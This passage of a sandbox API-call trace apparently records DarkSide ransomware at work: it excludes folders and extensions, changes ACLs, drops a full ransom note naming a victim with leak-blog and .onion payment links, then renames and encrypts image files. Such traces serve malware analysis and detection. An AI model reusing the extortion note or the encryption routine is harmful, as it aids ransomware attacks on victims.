(_String="config.msi") returned 0xa [0155.799] _wcsicmp (_Str1="$windows.~bt", _Str2="ZLQWp8VVzu") returned -86 [0155.799] wcslen (_String="$windows.~bt") returned 0xc [0155.799] _wcsicmp (_Str1="$windows.~ws", _Str2="ZLQWp8VVzu") returned -86 [0155.799] wcslen (_String="$windows.~ws") returned 0xc [0155.800] _wcsicmp (_Str1="windows", _Str2="ZLQWp8VVzu") returned -3 [0155.800] wcslen (_String="windows") returned 0x7 [0155.800] _wcsicmp (_Str1="appdata", _Str2="ZLQWp8VVzu") returned -25 [0155.800] wcslen (_String="appdata") returned 0x7 [0155.800] _wcsicmp (_Str1="application data", _Str2="ZLQWp8VVzu") returned -25 [0155.800] wcslen (_String="application data") returned 0x10 [0155.800] _wcsicmp (_Str1="boot", _Str2="ZLQWp8VVzu") returned -24 [0155.800] wcslen (_String="boot") returned 0x4 [0155.800] _wcsicmp (_Str1="google", _Str2="ZLQWp8VVzu") returned -19 [0155.800] wcslen (_String="google") returned 0x6 [0155.800] _wcsicmp (_Str1="mozilla", _Str2="ZLQWp8VVzu") returned -13 [0155.800] wcslen (_String="mozilla") returned 0x7 [0155.800] _wcsicmp (_Str1="program files", _Str2="ZLQWp8VVzu") returned -10 [0155.800] wcslen (_String="program files") returned 0xd [0155.800] _wcsicmp (_Str1="program files (x86)", _Str2="ZLQWp8VVzu") returned -10 [0155.800] wcslen (_String="program files (x86)") returned 0x13 [0155.800] _wcsicmp (_Str1="programdata", _Str2="ZLQWp8VVzu") returned -10 [0155.800] wcslen (_String="programdata") returned 0xb [0155.800] _wcsicmp (_Str1="system volume information", _Str2="ZLQWp8VVzu") returned -7 [0155.800] wcslen (_String="system volume information") returned 0x19 [0155.800] _wcsicmp (_Str1="tor browser", _Str2="ZLQWp8VVzu") returned -6 [0155.800] wcslen (_String="tor browser") returned 0xb [0155.800] _wcsicmp (_Str1="windows.old", _Str2="ZLQWp8VVzu") returned -3 [0155.800] wcslen (_String="windows.old") returned 0xb [0155.800] _wcsicmp (_Str1="intel", _Str2="ZLQWp8VVzu") returned -17 [0155.800] wcslen (_String="intel") returned 0x5 [0155.800] _wcsicmp (_Str1="msocache", _Str2="ZLQWp8VVzu") returned -13 [0155.800] wcslen (_String="msocache") returned 0x8 [0155.800] _wcsicmp (_Str1="perflogs", _Str2="ZLQWp8VVzu") returned -10 [0155.800] wcslen (_String="perflogs") returned 0x8 [0155.800] _wcsicmp (_Str1="x64dbg", _Str2="ZLQWp8VVzu") returned -2 [0155.800] wcslen (_String="x64dbg") returned 0x6 [0155.800] _wcsicmp (_Str1="public", _Str2="ZLQWp8VVzu") returned -10 [0155.800] wcslen (_String="public") returned 0x6 [0155.801] _wcsicmp (_Str1="all users", _Str2="ZLQWp8VVzu") returned -25 [0155.801] wcslen (_String="all users") returned 0x9 [0155.801] _wcsicmp (_Str1="default", _Str2="ZLQWp8VVzu") returned -22 [0155.801] wcslen (_String="default") returned 0x7 [0155.801] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\*" [0155.801] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\*") returned 0x32 [0155.801] wcscpy (in: _Dest=0x44e00e2, _Source="ZLQWp8VVzu" | out: _Dest="ZLQWp8VVzu") returned="ZLQWp8VVzu" [0155.801] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0155.801] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0155.801] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu" [0155.801] GetNamedSecurityInfoW () returned 0x0 [0155.801] SetEntriesInAclW () returned 0x0 [0155.801] SetNamedSecurityInfoW () returned 0x0 [0155.808] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2d58418) returned 1 [0155.808] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3fe5bc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0155.808] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu")) returned 1 [0155.808] strlen (_Str="----------- [ Welcome to DarkSide ] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n Data Leak \r\n ---------------------------------------------- \r\n Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. \r\n We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the world. \r\n \r\n Blog URL \r\n ---------------------------------------------- \r\n http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0xa8f [0155.808] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x678 [0155.809] WriteFile (in: hFile=0x678, lpBuffer=0x514f30*, nNumberOfBytesToWrite=0xa8f, lpNumberOfBytesWritten=0x3fe58c, lpOverlapped=0x0 | out: lpBuffer=0x514f30*, lpNumberOfBytesWritten=0x3fe58c*=0xa8f, lpOverlapped=0x0) returned 1 [0155.810] CloseHandle (hObject=0x678) returned 1 [0155.810] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0155.810] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu")) returned 0x10 [0155.810] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\") returned="" [0155.810] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\") returned 0x3c [0155.810] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\*", fInfoLevelId=0x0, lpFindFileData=0x3fe7ec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fe7ec) returned 0x2db87c0 [0155.810] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa205a2a0, ftCreationTime.dwHighDateTime=0x1d5de3c, ftLastAccessTime.dwLowDateTime=0xdb7b4b00, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xdb7b4b00, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0155.811] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabb27370, ftCreationTime.dwHighDateTime=0x1d5e687, ftLastAccessTime.dwLowDateTime=0x720dd320, ftLastAccessTime.dwHighDateTime=0x1d5e692, ftLastWriteTime.dwLowDateTime=0x720dd320, ftLastWriteTime.dwHighDateTime=0x1d5e692, nFileSizeHigh=0x0, nFileSizeLow=0x1451, dwReserved0=0x0, dwReserved1=0x0, cFileName="0Lg94VFH3xczLrTnshRI.jpg", cAlternateFileName="0LG94V~1.JPG")) returned 1 [0155.811] _wcsicmp (_Str1="0Lg94VFH3xczLrTnshRI.jpg", _Str2="README.c06622a1.TXT") returned -66 [0155.811] wcsstr (_Str="0Lg94VFH3xczLrTnshRI.jpg", _SubStr="README") returned 0x0 [0155.811] _wcsicmp (_Str1="autorun.inf", _Str2="0Lg94VFH3xczLrTnshRI.jpg") returned 49 [0155.811] wcslen (_String="autorun.inf") returned 0xb [0155.811] _wcsicmp (_Str1="boot.ini", _Str2="0Lg94VFH3xczLrTnshRI.jpg") returned 50 [0155.811] wcslen (_String="boot.ini") returned 0x8 [0155.811] _wcsicmp (_Str1="bootfont.bin", _Str2="0Lg94VFH3xczLrTnshRI.jpg") returned 50 [0155.811] wcslen (_String="bootfont.bin") returned 0xc [0155.811] _wcsicmp (_Str1="bootsect.bak", _Str2="0Lg94VFH3xczLrTnshRI.jpg") returned 50 [0155.811] wcslen (_String="bootsect.bak") returned 0xc [0155.811] _wcsicmp (_Str1="desktop.ini", _Str2="0Lg94VFH3xczLrTnshRI.jpg") returned 52 [0155.811] wcslen (_String="desktop.ini") returned 0xb [0155.811] _wcsicmp (_Str1="iconcache.db", _Str2="0Lg94VFH3xczLrTnshRI.jpg") returned 57 [0155.811] wcslen (_String="iconcache.db") returned 0xc [0155.811] _wcsicmp (_Str1="ntldr", _Str2="0Lg94VFH3xczLrTnshRI.jpg") returned 62 [0155.811] wcslen (_String="ntldr") returned 0x5 [0155.811] _wcsicmp (_Str1="ntuser.dat", _Str2="0Lg94VFH3xczLrTnshRI.jpg") returned 62 [0155.811] wcslen (_String="ntuser.dat") returned 0xa [0155.811] _wcsicmp (_Str1="ntuser.dat.log", _Str2="0Lg94VFH3xczLrTnshRI.jpg") returned 62 [0155.811] wcslen (_String="ntuser.dat.log") returned 0xe [0155.811] _wcsicmp (_Str1="ntuser.ini", _Str2="0Lg94VFH3xczLrTnshRI.jpg") returned 62 [0155.811] wcslen (_String="ntuser.ini") returned 0xa [0155.811] _wcsicmp (_Str1="thumbs.db", _Str2="0Lg94VFH3xczLrTnshRI.jpg") returned 68 [0155.811] wcslen (_String="thumbs.db") returned 0x9 [0155.812] _wcsicmp (_Str1="386", _Str2="jpg") returned -55 [0155.812] wcslen (_String="386") returned 0x3 [0155.812] _wcsicmp (_Str1="adv", _Str2="jpg") returned -9 [0155.812] wcslen (_String="adv") returned 0x3 [0155.812] _wcsicmp (_Str1="ani", _Str2="jpg") returned -9 [0155.812] wcslen (_String="ani") returned 0x3 [0155.812] _wcsicmp (_Str1="bat", _Str2="jpg") returned -8 [0155.812] wcslen (_String="bat") returned 0x3 [0155.812] _wcsicmp (_Str1="bin", _Str2="jpg") returned -8 [0155.812] wcslen (_String="bin") returned 0x3 [0155.812] _wcsicmp (_Str1="cab", _Str2="jpg") returned -7 [0155.812] wcslen (_String="cab") returned 0x3 [0155.812] _wcsicmp (_Str1="cmd", _Str2="jpg") returned -7 [0155.812] wcslen (_String="cmd") returned 0x3 [0155.812] _wcsicmp (_Str1="com", _Str2="jpg") returned -7 [0155.812] wcslen (_String="com") returned 0x3 [0155.812] _wcsicmp (_Str1="cpl", _Str2="jpg") returned -7 [0155.812] wcslen (_String="cpl") returned 0x3 [0155.812] _wcsicmp (_Str1="cur", _Str2="jpg") returned -7 [0155.812] wcslen (_String="cur") returned 0x3 [0155.812] _wcsicmp (_Str1="deskthemepack", _Str2="jpg") returned -6 [0155.812] wcslen (_String="deskthemepack") returned 0xd [0155.812] _wcsicmp (_Str1="diagcab", _Str2="jpg") returned -6 [0155.812] wcslen (_String="diagcab") returned 0x7 [0155.812] _wcsicmp (_Str1="diagcfg", _Str2="jpg") returned -6 [0155.812] wcslen (_String="diagcfg") returned 0x7 [0155.812] _wcsicmp (_Str1="diagpkg", _Str2="jpg") returned -6 [0155.813] wcslen (_String="diagpkg") returned 0x7 [0155.813] _wcsicmp (_Str1="dll", _Str2="jpg") returned -6 [0155.813] wcslen (_String="dll") returned 0x3 [0155.813] _wcsicmp (_Str1="drv", _Str2="jpg") returned -6 [0155.813] wcslen (_String="drv") returned 0x3 [0155.813] _wcsicmp (_Str1="exe", _Str2="jpg") returned -5 [0155.813] wcslen (_String="exe") returned 0x3 [0155.813] _wcsicmp (_Str1="hlp", _Str2="jpg") returned -2 [0155.813] wcslen (_String="hlp") returned 0x3 [0155.813] _wcsicmp (_Str1="icl", _Str2="jpg") returned -1 [0155.813] wcslen (_String="icl") returned 0x3 [0155.813] _wcsicmp (_Str1="icns", _Str2="jpg") returned -1 [0155.813] wcslen (_String="icns") returned 0x4 [0155.813] _wcsicmp (_Str1="ico", _Str2="jpg") returned -1 [0155.813] wcslen (_String="ico") returned 0x3 [0155.813] _wcsicmp (_Str1="ics", _Str2="jpg") returned -1 [0155.813] wcslen (_String="ics") returned 0x3 [0155.813] _wcsicmp (_Str1="idx", _Str2="jpg") returned -1 [0155.813] wcslen (_String="idx") returned 0x3 [0155.813] _wcsicmp (_Str1="ldf", _Str2="jpg") returned 2 [0155.813] wcslen (_String="ldf") returned 0x3 [0155.813] _wcsicmp (_Str1="lnk", _Str2="jpg") returned 2 [0155.813] wcslen (_String="lnk") returned 0x3 [0155.813] _wcsicmp (_Str1="mod", _Str2="jpg") returned 3 [0155.813] wcslen (_String="mod") returned 0x3 [0155.813] _wcsicmp (_Str1="mpa", _Str2="jpg") returned 3 [0155.813] wcslen (_String="mpa") returned 0x3 [0155.813] _wcsicmp (_Str1="msc", _Str2="jpg") returned 3 [0155.813] wcslen (_String="msc") returned 0x3 [0155.813] _wcsicmp (_Str1="msp", _Str2="jpg") returned 3 [0155.813] wcslen (_String="msp") returned 0x3 [0155.813] _wcsicmp (_Str1="msstyles", _Str2="jpg") returned 3 [0155.813] wcslen (_String="msstyles") returned 0x8 [0155.813] _wcsicmp (_Str1="msu", _Str2="jpg") returned 3 [0155.814] wcslen (_String="msu") returned 0x3 [0155.814] _wcsicmp (_Str1="nls", _Str2="jpg") returned 4 [0155.814] wcslen (_String="nls") returned 0x3 [0155.814] _wcsicmp (_Str1="nomedia", _Str2="jpg") returned 4 [0155.814] wcslen (_String="nomedia") returned 0x7 [0155.814] _wcsicmp (_Str1="ocx", _Str2="jpg") returned 5 [0155.814] wcslen (_String="ocx") returned 0x3 [0155.814] _wcsicmp (_Str1="prf", _Str2="jpg") returned 6 [0155.814] wcslen (_String="prf") returned 0x3 [0155.814] _wcsicmp (_Str1="ps1", _Str2="jpg") returned 6 [0155.814] wcslen (_String="ps1") returned 0x3 [0155.814] _wcsicmp (_Str1="rom", _Str2="jpg") returned 8 [0155.814] wcslen (_String="rom") returned 0x3 [0155.814] _wcsicmp (_Str1="rtp", _Str2="jpg") returned 8 [0155.814] wcslen (_String="rtp") returned 0x3 [0155.814] _wcsicmp (_Str1="scr", _Str2="jpg") returned 9 [0155.814] wcslen (_String="scr") returned 0x3 [0155.814] _wcsicmp (_Str1="shs", _Str2="jpg") returned 9 [0155.814] wcslen (_String="shs") returned 0x3 [0155.814] _wcsicmp (_Str1="spl", _Str2="jpg") returned 9 [0155.814] wcslen (_String="spl") returned 0x3 [0155.814] _wcsicmp (_Str1="sys", _Str2="jpg") returned 9 [0155.814] wcslen (_String="sys") returned 0x3 [0155.814] _wcsicmp (_Str1="theme", _Str2="jpg") returned 10 [0155.814] wcslen (_String="theme") returned 0x5 [0155.814] _wcsicmp (_Str1="themepack", _Str2="jpg") returned 10 [0155.814] wcslen (_String="themepack") returned 0x9 [0155.814] _wcsicmp (_Str1="wpx", _Str2="jpg") returned 13 [0155.814] wcslen (_String="wpx") returned 0x3 [0155.814] _wcsicmp (_Str1="lock", _Str2="jpg") returned 2 [0155.814] wcslen (_String="lock") returned 0x4 [0155.814] _wcsicmp (_Str1="key", _Str2="jpg") returned 1 [0155.814] wcslen (_String="key") returned 0x3 [0155.815] _wcsicmp (_Str1="hta", _Str2="jpg") returned -2 [0155.815] wcslen (_String="hta") returned 0x3 [0155.815] _wcsicmp (_Str1="msi", _Str2="jpg") returned 3 [0155.815] wcslen (_String="msi") returned 0x3 [0155.815] _wcsicmp (_Str1="pdb", _Str2="jpg") returned 6 [0155.815] wcslen (_String="pdb") returned 0x3 [0155.815] _wcsicmp (_Str1="sql", _Str2="jpg") returned 9 [0155.815] wcslen (_String="sql") returned 0x3 [0155.815] _wcsicmp (_Str1="sqlite", _Str2="jpg") returned 9 [0155.815] wcslen (_String="sqlite") returned 0x6 [0155.815] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu")) returned 0x10 [0155.815] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45300a8 [0155.816] wcscpy (in: _Dest=0x45300a8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu" [0155.816] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu") returned 0x3b [0155.816] wcscpy (in: _Dest=0x4530120, _Source="0Lg94VFH3xczLrTnshRI.jpg" | out: _Dest="0Lg94VFH3xczLrTnshRI.jpg") returned="0Lg94VFH3xczLrTnshRI.jpg" [0155.816] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\0Lg94VFH3xczLrTnshRI.jpg", dwFileAttributes=0x80) returned 1 [0155.816] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\0Lg94VFH3xczLrTnshRI.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\0lg94vfh3xczlrtnshri.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x648 [0155.817] SetFilePointerEx (in: hFile=0x648, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.817] ReadFile (in: hFile=0x648, lpBuffer=0x3fe674, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe704, lpOverlapped=0x0 | out: lpBuffer=0x3fe674*, lpNumberOfBytesRead=0x3fe704*=0x90, lpOverlapped=0x0) returned 1 [0155.817] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe674, Length=0x80) returned 0xb2c2a7d1 [0155.817] RtlComputeCrc32 (PartialCrc=0xa7d1, Buffer=0x3fe674, Length=0x80) returned 0x54c80ac2 [0155.817] RtlComputeCrc32 (PartialCrc=0xac2, Buffer=0x3fe674, Length=0x80) returned 0xaf1ade80 [0155.817] RtlComputeCrc32 (PartialCrc=0xde80, Buffer=0x3fe674, Length=0x80) returned 0x84847e28 [0155.817] RtlComputeCrc32 (PartialCrc=0x7e28, Buffer=0x3fe674, Length=0x80) returned 0x236ab9d5 [0155.817] CloseHandle (hObject=0x648) returned 1 [0155.818] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45400b0 [0155.818] wcscpy (in: _Dest=0x45400b0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\0Lg94VFH3xczLrTnshRI.jpg" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\0Lg94VFH3xczLrTnshRI.jpg") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\0Lg94VFH3xczLrTnshRI.jpg" [0155.818] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\0Lg94VFH3xczLrTnshRI.jpg") returned 0x54 [0155.818] wcscpy (in: _Dest=0x4540158, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0155.818] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\0Lg94VFH3xczLrTnshRI.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\0lg94vfh3xczlrtnshri.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\0Lg94VFH3xczLrTnshRI.jpg.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\0lg94vfh3xczlrtnshri.jpg.c06622a1"), dwFlags=0x8) returned 1 [0155.821] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\0Lg94VFH3xczLrTnshRI.jpg.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\0lg94vfh3xczlrtnshri.jpg.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x648 [0155.821] CreateIoCompletionPort (FileHandle=0x648, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0155.821] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x49d0020 [0155.827] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6ee1a59f [0155.827] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5e2f2469 [0155.827] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x30f0e824 [0155.827] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x46554250 [0155.827] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4637743f [0155.827] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x216f44b7 [0155.827] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1646463c [0155.828] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x53b6153f [0155.831] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x49d0094, Length=0x80) returned 0x4d71a2a [0155.831] RtlComputeCrc32 (PartialCrc=0x1a2a, Buffer=0x49d0094, Length=0x80) returned 0x185c8cc7 [0155.831] RtlComputeCrc32 (PartialCrc=0x8cc7, Buffer=0x49d0094, Length=0x80) returned 0xbc502d7a [0155.831] RtlComputeCrc32 (PartialCrc=0x2d7a, Buffer=0x49d0094, Length=0x80) returned 0xb2739caf [0155.831] RtlComputeCrc32 (PartialCrc=0x9caf, Buffer=0x49d0094, Length=0x80) returned 0x18f0bbdc [0155.831] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x49d0020) returned 1 [0155.831] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45300a8) returned 1 [0155.831] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45400b0) returned 1 [0155.831] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a7adc70, ftCreationTime.dwHighDateTime=0x1d5e81d, ftLastAccessTime.dwLowDateTime=0x9cfa1840, ftLastAccessTime.dwHighDateTime=0x1d5e0c6, ftLastWriteTime.dwLowDateTime=0x9cfa1840, ftLastWriteTime.dwHighDateTime=0x1d5e0c6, nFileSizeHigh=0x0, nFileSizeLow=0x5c55, dwReserved0=0x0, dwReserved1=0x0, cFileName="JdUgY81.png", cAlternateFileName="")) returned 1 [0155.831] _wcsicmp (_Str1="JdUgY81.png", _Str2="README.c06622a1.TXT") returned -8 [0155.831] wcsstr (_Str="JdUgY81.png", _SubStr="README") returned 0x0 [0155.831] _wcsicmp (_Str1="autorun.inf", _Str2="JdUgY81.png") returned -9 [0155.831] wcslen (_String="autorun.inf") returned 0xb [0155.831] _wcsicmp (_Str1="boot.ini", _Str2="JdUgY81.png") returned -8 [0155.831] wcslen (_String="boot.ini") returned 0x8 [0155.831] _wcsicmp (_Str1="bootfont.bin", _Str2="JdUgY81.png") returned -8 [0155.831] wcslen (_String="bootfont.bin") returned 0xc [0155.831] _wcsicmp (_Str1="bootsect.bak", _Str2="JdUgY81.png") returned -8 [0155.831] wcslen (_String="bootsect.bak") returned 0xc [0155.831] _wcsicmp (_Str1="desktop.ini", _Str2="JdUgY81.png") returned -6 [0155.831] wcslen (_String="desktop.ini") returned 0xb [0155.831] _wcsicmp (_Str1="iconcache.db", _Str2="JdUgY81.png") returned -1 [0155.831] wcslen (_String="iconcache.db") returned 0xc [0155.831] _wcsicmp (_Str1="ntldr", _Str2="JdUgY81.png") returned 4 [0155.831] wcslen (_String="ntldr") returned 0x5 [0155.831] _wcsicmp (_Str1="ntuser.dat", _Str2="JdUgY81.png") returned 4 [0155.832] wcslen (_String="ntuser.dat") returned 0xa [0155.832] _wcsicmp (_Str1="ntuser.dat.log", _Str2="JdUgY81.png") returned 4 [0155.832] wcslen (_String="ntuser.dat.log") returned 0xe [0155.832] _wcsicmp (_Str1="ntuser.ini", _Str2="JdUgY81.png") returned 4 [0155.832] wcslen (_String="ntuser.ini") returned 0xa [0155.832] _wcsicmp (_Str1="thumbs.db", _Str2="JdUgY81.png") returned 10 [0155.832] wcslen (_String="thumbs.db") returned 0x9 [0155.832] _wcsicmp (_Str1="386", _Str2="png") returned -61 [0155.832] wcslen (_String="386") returned 0x3 